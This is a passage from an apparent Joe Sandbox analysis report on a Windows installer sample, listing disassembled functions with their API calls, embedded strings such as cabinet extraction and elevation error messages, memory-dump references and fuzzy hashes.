                                                                                                                                                                                                                                                                                                  • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1970631241-3111339858
                                                                                                                                                                                                                                                                                                  • Opcode ID: 781d6c99c381d9b0f08683dbafd6cad56b84b673d9afdd3ea64272441c5a889b
                                                                                                                                                                                                                                                                                                  • Instruction ID: dac933142ca016e666b55566681dbed59c43b8d88d3a3347c5720b01a1894e2e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 781d6c99c381d9b0f08683dbafd6cad56b84b673d9afdd3ea64272441c5a889b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51210E76500205ABCB54EF6CD881D9A3BBAFF89324B214259FE14CB342E732D900CB61
                                                                                                                                                                                                                                                                                                  Function 00869AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869AFB
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 00869B10
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 00869B1B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format variable string., xrefs: 00869B06
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00869B7A
                                                                                                                                                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00869B54
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1811509786-402580132
                                                                                                                                                                                                                                                                                                  • Opcode ID: dcad57bf394a94e2c81a84f558666ca221b5080b5706f8b9f3c4f58dbf63de6e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5d311988607e1007a5c5c0d8ae2c3a1740f6ed6732437a1bb409744c214f3b1e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcad57bf394a94e2c81a84f558666ca221b5080b5706f8b9f3c4f58dbf63de6e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF11D632940536BBEB221AA8AD82F6DB61DFF11774F120321F950E62D087755D10A6D5
                                                                                                                                                                                                                                                                                                  Function 00880C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00880CC4
                                                                                                                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00880CD6
                                                                                                                                                                                                                                                                                                  • SetFileTime.KERNEL32(?,?,?,?), ref: 00880CE9
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,008808B1,?,?), ref: 00880CF8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Invalid operation for this state., xrefs: 00880C9D
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880C93
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                                                                                                                                                  • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 609741386-1751360545
                                                                                                                                                                                                                                                                                                  • Opcode ID: c02e2a7cc08c66f4d79aa62d9d4b239c388680f49fdd746f91540a94312e7db1
                                                                                                                                                                                                                                                                                                  • Instruction ID: f24878d9565969a39eed69f0c9393d5e1615736e9c2bccc0197794caf927056c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c02e2a7cc08c66f4d79aa62d9d4b239c388680f49fdd746f91540a94312e7db1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A721D27280061AAB8B60AFA8CD499FABBBCFF057207104316F864D6691D374EA15CF90
                                                                                                                                                                                                                                                                                                  Function 00874A77 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,0087539D), ref: 00874AC3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • pipe.cpp, xrefs: 00874AFB
                                                                                                                                                                                                                                                                                                  • Failed to allocate message to write., xrefs: 00874AA2
                                                                                                                                                                                                                                                                                                  • Failed to write message type to pipe., xrefs: 00874B05
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 00874A7D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3934441357-606776022
                                                                                                                                                                                                                                                                                                  • Opcode ID: f1c905ec699d2a261560bcaa8bdc5ce42470c12a121f1a5af10a49347771bceb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8699b8265cc4007ef48e8c66a94f85f92fe03293956159b8b45f34fe7e54cd17
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1c905ec699d2a261560bcaa8bdc5ce42470c12a121f1a5af10a49347771bceb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E11CD32940129BBDB218F88DD06ADEBAA8FB40360F118065F904F6251DB30DE00EAA5
                                                                                                                                                                                                                                                                                                  Function 00874642 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 00874693
                                                                                                                                                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 008746A6
                                                                                                                                                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 008746C1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _memcpy_s$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 886498622-766083570
                                                                                                                                                                                                                                                                                                  • Opcode ID: 68263e0ddc1463203eb6f56b48175d9a4771a9fa762e3b78276d5c3e68d36231
                                                                                                                                                                                                                                                                                                  • Instruction ID: d8e0b6f59432e6d556ec625604ce8e0bac78f699d6978c58ff86137a4352e29f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68263e0ddc1463203eb6f56b48175d9a4771a9fa762e3b78276d5c3e68d36231
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55119EB250430EABDB01AE98DC82DEB77ACFF15B10B014526FA15DB241EB71E654CBE1
                                                                                                                                                                                                                                                                                                  Function 008A96CD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                                                                  • API String ID: 0-1718035505
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f345a934d470c0fe0da97973e9401c0596ad76b2e99806b2876d4e95a6cc0e1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 99e6ca0e7c440a47c3c60fa0ff8658b4b60b851d0ca40d2e5e9c12cc88b4ec84
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f345a934d470c0fe0da97973e9401c0596ad76b2e99806b2876d4e95a6cc0e1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01F97166A6229B6F200E655CD5E9727A8FA23396314007ED5B5D3A00EB61C84496A0
                                                                                                                                                                                                                                                                                                  Function 008A0ACC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32$procutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4275029093-1586155540
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1442a507bd6d832e3eaef3a3d21f17696cd78b7dc1e77ba02857f38f9671f132
                                                                                                                                                                                                                                                                                                  • Instruction ID: b7126aff9e2b0e695b0569bade5c981bd959b042d3a700da9b6ddef6c142bb53
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1442a507bd6d832e3eaef3a3d21f17696cd78b7dc1e77ba02857f38f9671f132
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFF0C872E00639A7E7209B958D09E9BBF68FF06761B114164BD14E7780EB74DD01CBE0
                                                                                                                                                                                                                                                                                                  Function 0089A20B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00893479,00893479,?,?,?,0089A45C,00000001,00000001,ECE85006), ref: 0089A265
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0089A45C,00000001,00000001,ECE85006,?,?,?), ref: 0089A2EB
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0089A3E5
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0089A3F2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0089521A: HeapAlloc.KERNEL32(00000000,?,?,?,00891F87,?,0000015D,?,?,?,?,008933E0,000000FF,00000000,?,?), ref: 0089524C
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0089A3FB
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0089A420
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3147120248-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4d5cbd84d95d5533b0441ff9440ab2598a0b5867735228d65280926102668303
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4982f7ac305c3a1018356220cee2df875ce5ae91a22db0d47f08105ad22425ce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d5cbd84d95d5533b0441ff9440ab2598a0b5867735228d65280926102668303
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E51E472610216AFEF29AF68CC41EBF77A9FB44750F1D4629FC05D6240DB35DC80A692
                                                                                                                                                                                                                                                                                                  Function 00878CAC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 00878D18
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                                                                  • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                                                                                                                                                                                                                                                                  • API String ID: 3472027048-398165853
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0434f1d7b758a568ca75fb942feef053446fb461847bdde1afcdddc79e15db83
                                                                                                                                                                                                                                                                                                  • Instruction ID: ada54c0a34fb585c5d273374eccf75ff32733a389c462449410acfd6df213f85
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0434f1d7b758a568ca75fb942feef053446fb461847bdde1afcdddc79e15db83
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13310932980615FBEB3265588C4AFBF6A5CFF20750F118015FD08F7285EA38CD1056A2
                                                                                                                                                                                                                                                                                                  Function 0087E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 0087E985
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0087E994
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 0087E9A8
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0087E9B8
                                                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0087E9D2
                                                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0087EA31
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3812958022-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4412a745a005d7a42f92d45d582931db9358ab12050a8135d0eba08d78f786b4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 83e8acf30ff3c9175780ad4a552d11634634c24df85be7e52616edd937bd84c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4412a745a005d7a42f92d45d582931db9358ab12050a8135d0eba08d78f786b4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7921E072100218BFDF119F68DC48EAA7FA5FF59310F108218FA0ADA2A9C331DD10DB91
                                                                                                                                                                                                                                                                                                  Function 0087C7C9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 164synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to save state., xrefs: 0087C891
                                                                                                                                                                                                                                                                                                  • elevation.cpp, xrefs: 0087C9B8
                                                                                                                                                                                                                                                                                                  • Unexpected elevated message sent to child process, msg: %u, xrefs: 0087C9C4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandleMutexRelease
                                                                                                                                                                                                                                                                                                  • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4207627910-1576875097
                                                                                                                                                                                                                                                                                                  • Opcode ID: cb3a83a530ef967e1d443943384756372ff3f2b7b281e5630759a7675e9b12c3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 158d25a9a42131e51938717bec199a6d808f5b020b1dc7789773c849415e77ff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb3a83a530ef967e1d443943384756372ff3f2b7b281e5630759a7675e9b12c3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7361B23A100614EFCB125F84CD41D59BFA2FF08714715C459FAAD9B636C732E821EB46
                                                                                                                                                                                                                                                                                                  Function 008A1217 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150registrystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008A123F
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008770E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008A1276
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 008A136E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3790715954-1648651458
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e8361191c08b532aef678c2bd3dc23f9bd6a0a5d0f60c1de50ad557ffeb0eaa
                                                                                                                                                                                                                                                                                                  • Instruction ID: 38ea0a3c0e836bdf60226e7af165692c0b8ecb74684bfe64939de7d90a4d6aec
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e8361191c08b532aef678c2bd3dc23f9bd6a0a5d0f60c1de50ad557ffeb0eaa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31418F35A0021AEFEF21DF95C849EAEB7BAFF56710F154169E901EBB00D634DD009BA0
                                                                                                                                                                                                                                                                                                  Function 008A6357 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130fileCOMMON
